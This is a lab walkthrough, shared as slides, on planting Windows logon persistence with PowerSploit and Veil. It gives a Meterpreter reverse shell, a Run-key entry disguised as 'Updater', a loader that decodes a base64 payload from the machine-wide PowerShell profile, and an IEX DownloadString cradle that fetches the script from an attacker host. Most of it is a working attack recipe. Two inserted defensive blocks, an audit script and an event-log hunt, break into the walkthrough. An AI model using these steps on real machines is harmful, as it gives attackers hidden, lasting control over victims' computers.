PowerSploit persistence walkthrough


Upload: haydn-johnson

Post on 12-Apr-2017


Page 1: Power sploit persistence walkthrough

How to create Persistence with PowerSploit and the Veil Framework.

Author: Haydn Johnson
Original Content: https://www.fishnetsecurity.com/6labs/blog/how-post-ex-persistence-scripting-powersploit-veil

Reason: Due to the new updates in PowerSploit I wanted to give persistence a try. Also, the write-up above skips some steps, assuming a more knowledgeable audience. There is a simple change in the Persistence Module syntax and as a result I wanted to write this blog. This also acts as detailed notes for myself to come back to.

What you will learn: This blog gives a step by step guide to creating persistence with PowerSploit. A reverse shell will be sent to the attacker when a victim logs into their machine.

Assumptions:
The Veil Framework is installed on a Kali Linux machine.
PowerSploit has been downloaded to a Windows machine.
Basic knowledge of Windows and Unix.
Basic understanding of Metasploit, reverse shells etc.
Ability to have a connection between Victim and Attacking machines (VirtualBox/VMware).

The IP addresses that your systems have will most likely be different, as I did not create a standard VirtualBox host-only network; please make adjustments to anything you follow.

Please note:

The victim machine is used to create the powershell persistence file with PowerSploit, and that is used to infect the victim (same machines).

Ideally, the script would be created on a non-victim machine acting as a secondary attacking machine. The persistence script would then be executed on the victim machine.

Links:
PowerSploit: https://github.com/PowerShellMafia/PowerSploit
Veil-Framework: https://www.veil-framework.com/

Lab used for this:
VirtualBox virtualization software
Kali Linux 2.0
Windows 7


To give an understanding of the environment, the following information is given. Veil-Evasion is installed on the Kali machine:

PowerSploit is saved on the Victim Machine:

The IP address for the Attacking machine is:

The IP address for the Victim machine is:


High Level Steps:

1. Create Payload with Veil
2. Separate the required code for the PowerSploit Persistence Script
3. Use PowerSploit to create the Persistence Script
4. Set up a Listener to catch the Payload
5. Execute the Persistence Script
6. Test the Persistence works

I have also included a ‘manual’ way to do this using the key commands PowerSploit uses, as well as using an IEX cradle to download and execute the script remotely.

Creating the Payload: The first step is to create a payload. We want the victim system to do something when the persistence triggers; in this case we are going to create a reverse Meterpreter shell that connects back to the attacking machine. We will use Veil-Evasion to create the Meterpreter shell. Veil-Evasion will create a .bat file that launches a base64 encoded Meterpreter; we will use that base64 encoded payload as part of the PowerSploit script to create persistence. Run Veil-Evasion:


You should be greeted with this screen:

Create a powershell/meterpreter/rev_https payload:

Type ‘use 22’ and the options for the payload will be shown:

Ensure the correct payload is selected.


Set the options with the correct IP address (the Attacking machine):

Type ‘info’ to confirm the correct IP address has been chosen:

Type ‘generate’ to create the payload:

Veil gives two output files:
The ‘Payload file’ will be used in the PowerSploit script.
The ‘Handler file’ will be used to create a listener for the reverse shell.

The payload has now been created.


Getting the correct code to use from the payload: The payload has been created in the correct format, Base64. However, Veil wraps it in a batch file so that it executes as a batch file; this tutorial does not use the batch file, so it will show how to extract the code in order to create the persistence script. Browse to and open the ‘Payload File’.

This ‘Payload File’ is a batch file that can be run on Windows to create our shell. There are 2 encoded payloads here. We are going to use the first one. Highlight the first encoded payload and copy and paste it into a text file on its own. This ensures that the whole payload is used. PLEASE NOTE:

The last character ‘\’ is supposedly base64, but for some reason (maybe to do with how PowerShell executes it) it creates an error when PowerShell attempts to execute the command.

This issue shows itself when the persistence executes. Please remove it:


Reminder: remove the last backslash. This is the base64 payload that will be used in the following steps. Move this over to the Victim machine.

On the Victim Machine: We have to create the persistence script using PowerSploit. This involves importing the Persistence module and adding the relevant information needed, including the payload and the persistence options. Importing the PowerSploit Persistence Module: type ‘Import-Module .\Persistence’

This has imported the module, giving access to the Persistence functionality.


Adding the Persistence options: PowerSploit has different persistence options; we are going to use it to execute our shell upon logon for an administrator and for a normal user. We will use the Add-Persistence cmdlet to create the persistence script. Its options are:

The first variable (scriptblock) is going to read in our base64 encoded payload. We will use the following format:

$p = iex $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String("VEIL_PAYLOAD_HERE")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd()

Use a text file and copy and paste the base64 payload into it. You should end up with a text file combining the above command with the VEIL_PAYLOAD_HERE section replaced by the base64 encoding, such as the below:


Copy and paste this into PowerShell:

Then echo the variable to confirm it has been created:

The scriptblock is saved as a variable; now set the UserPersistenceOption and ElevatedPersistenceOption to execute when the user logs on. To do this, create two variables like below and place them into a text file:

$u = New-UserPersistenceOption -Registry -AtLogon
$e = New-ElevatedPersistenceOption -Registry -AtLogon

Copy and paste each command (1 by 1) into PowerShell:


Echo the variables to ensure they have been created:

This has set the variables needed for the Add-Persistence cmdlet to create the persistence script.

Create the Persistence Script

Use the Add-Persistence cmdlet to generate the script. The following code will be used:

Add-Persistence -ScriptBlock $p -ElevatedPersistenceOption $e -Verbose -UserPersistenceOption $u -PassThru

As shown:


The script has been created. Confirm this: a Persistence script and a RemovePersistence script should be in the folder from which you ran the command.

The Persistence script creates the persistence and the RemovePersistence script removes it (that is, it reverts the changes the Persistence script made).


Back to the Attacking Machine

Create the Listener for our payload:

In order to receive the payload on our Attacking machine, we must have a listener set up to catch the reverse shell. Navigate in Kali Linux to the location of the handler file:

Open the file in a text editor, as it will be used to create the listener. Launch Metasploit in a terminal:
‘service postgresql start’
‘msfconsole’

Copy and paste the commands from the handler file into the msfconsole terminal:


Confirm the listener is set up: type ‘jobs’

Now the listener is set up, let's go back to the victim machine and run our persistence script.

Back to the Victim machine

Create the persistence:

As we have the Persistence script created, we simply need to run it.

Your persistence is created (the changes selected have been made to the victim machine).


Confirm the persistence works: You can log out and back in, and you should receive a shell.

Another easy way to check is to relaunch PowerShell. This should send you a shell. This works because the command that executes the shell runs whenever PowerShell starts: the command is saved in the AllUsersAllHosts profile. To see the AllUsersAllHosts profile, echo $PROFILE.AllUsersAllHosts to find the location and then view the file.


Persistence Not Using The PowerSploit Script: Having a look at the Persistence script created by PowerSploit, you can deduce the main commands used to create the persistence, albeit without the ability to easily add the options you want. This is smaller and quicker if you're in a hurry.

Create the registry item to launch PowerShell upon any user logging on: The persistence chosen is to edit the registry so that as a user logs on it launches powershell.exe. Execute the following code in PowerShell:

New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Updater -PropertyType String -Value "`"$($Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe`" -NonInteractive -WindowStyle Hidden"

If you wish to confirm this has worked, you are able to look it up in the registry under HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\, as the value called Updater.


<TO ADD: Get-Item property registry location>

Add the PAYLOAD to the AllUsersAllHosts profile: When the user logs on, powershell.exe will execute with the default profile. The below will show how to set that profile for all users. Use the below code to add the payload to the AllUsersAllHosts profile:

echo "sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('BASE 64 ENCODED PAYLOAD'),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()" | Out-File $PROFILE.AllUsersAllHosts -Fo
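The two commands above leave two concrete artifacts on the host: a Run-key value that starts a hidden powershell.exe at logon, and a machine-wide profile that decodes and runs a payload every time PowerShell starts. The following audit script is an added example (not part of the original walkthrough or of PowerSploit) that looks for both; it assumes it is run elevated on the Windows host being checked.

```powershell
# Added example (not from the original walkthrough): audit the two artifacts
# this technique leaves behind, the Run-key value that starts a hidden
# powershell.exe at logon and the machine-wide profile that carries the loader.
# Assumes it runs elevated on the Windows host being checked.

$runKey   = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'
$findings = @()

# 1. Run-key values that start PowerShell hidden or non-interactively.
$runValues = Get-ItemProperty -Path $runKey -ErrorAction SilentlyContinue
foreach ($prop in $runValues.PSObject.Properties) {
    if ($prop.Name -like 'PS*') { continue }          # provider metadata (PSPath etc.)
    $cmd = [string]$prop.Value
    if ($cmd -match 'powershell(\.exe)?' -and
        $cmd -match '-NonInteractive|-WindowStyle\s+Hidden|-enc') {
        $findings += [pscustomobject]@{
            Location = "$runKey\$($prop.Name)"         # e.g. the value named Updater
            Evidence = $cmd
        }
    }
}

# 2. Machine-wide profiles that decode/decompress and iex a payload at startup.
$loaderPattern = 'FromBase64String|DeflateStream|DownloadString|Invoke-Expression|\biex\b'
foreach ($path in @($PROFILE.AllUsersAllHosts, $PROFILE.AllUsersCurrentHost)) {
    if (-not (Test-Path -Path $path)) { continue }
    foreach ($hit in (Select-String -Path $path -Pattern $loaderPattern)) {
        $findings += [pscustomobject]@{
            Location = "$path (line $($hit.LineNumber))"
            Evidence = $hit.Line.Trim()
        }
    }
}

if ($findings) {
    $findings | Format-Table -AutoSize -Wrap
} else {
    'No Run-key or profile persistence indicators found.'
}
```

Reverting a finding is the same work the RemovePersistence script does: remove the Run-key value with Remove-ItemProperty and delete the loader line from the profile file.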


Persistence with an IEX cradle: The idea of using an IEX cradle is that if you have remote access you can host your ‘persistence’ script and use PowerShell to download it and run it in memory. This emulates a live attack and allows you to practice on your own. Using the above knowledge (from PowerSploit), we use 2 commands to create persistence:

1. Setting the registry to launch PowerShell upon logon
2. Setting the default profile to send us a shell

1 - New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Updater -PropertyType String -Value "`"$($Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe`" -NonInteractive -WindowStyle Hidden"

2 - echo "sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('BASE 64 ENCODED PAYLOAD'),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()" | Out-File $PROFILE.AllUsersAllHosts -Fo


Create the Persistence Script: Similar to batch, a PowerShell script executes commands line by line. As a result we simply copy and paste the 2 commands into a .ps1 file and host it on our Kali machine.

Host the Script on the Attacking Machine. PLEASE NOTE:

I did a lot of testing and you may run into issues if you create the script and then move it over to a Linux machine. There are formatting errors when simply moving the file to Linux.


You will see the following formatting error:

Instead, open the file on Windows and copy and paste its contents into a file on Linux.

The victim needs to be able to download the script, so it will be hosted on the Attacker machine. Copy the file into the /var/www/html directory on Kali Linux 2. Start Apache in Kali:
‘service apache2 start’

Ensure you can access the script hosted on Kali. If unable to access it, chmod 777 it:


Use the IEX cradle to download and run the remote script: Use the code below, pointing at your script, to have the victim download and execute it:

IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.3/persistence_test3.ps1')

Test the persistence works: Have your listener ready on Kali and reboot.

Launch your Victim machine and log in.


You should receive a shell when you log in to the victim machine.

Those are the steps for using the IEX cradle.
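Every step of the IEX cradle variant (the DownloadString cradle, the Run-key write and the profile write) is plain PowerShell, so with Script Block Logging enabled each one is recorded as a 4104 event. The query below is an added example (not part of the original walkthrough) that pulls those events and flags the patterns used above; it assumes Script Block Logging is turned on by policy, that it runs elevated on the host being reviewed, and the one-day window is an arbitrary choice.

```powershell
# Added example (not from the original walkthrough): hunt for the download cradle
# and the in-memory loader in PowerShell Script Block Logging (event ID 4104).
# Assumes Script Block Logging is enabled via policy and the script runs elevated
# on the host being reviewed; the time window below is an arbitrary choice.

$patterns = @(
    'DownloadString\(',                     # IEX (New-Object Net.WebClient).DownloadString(...)
    'Invoke-Expression|\biex\b',            # run downloaded or decoded text as code
    'FromBase64String\(',                   # embedded base64 payload
    'DeflateStream',                        # decompression of the embedded payload
    'CurrentVersion\\Run',                  # Run-key write (New-ItemProperty)
    'AllUsersAllHosts'                      # machine-wide profile write
)
$regex = $patterns -join '|'

$events = Get-WinEvent -FilterHashtable @{
    LogName   = 'Microsoft-Windows-PowerShell/Operational'
    Id        = 4104
    StartTime = (Get-Date).AddDays(-1)
} -ErrorAction SilentlyContinue

$hits = foreach ($event in $events) {
    # Property index 2 of a 4104 event is the logged script block text.
    $text    = [string]$event.Properties[2].Value
    $matched = [regex]::Matches($text, $regex, 'IgnoreCase') |
               ForEach-Object { $_.Value } | Sort-Object -Unique
    if (-not $matched) { continue }
    $preview = if ($text.Length -gt 100) { $text.Substring(0, 100) + '...' } else { $text }
    [pscustomobject]@{
        Time       = $event.TimeCreated
        Indicators = $matched -join ', '
        Preview    = $preview
    }
}

$hits | Sort-Object Time | Format-Table -AutoSize -Wrap
```

Because the profile loader runs on every PowerShell start, it shows up repeatedly in this output rather than once, which is itself a useful tell.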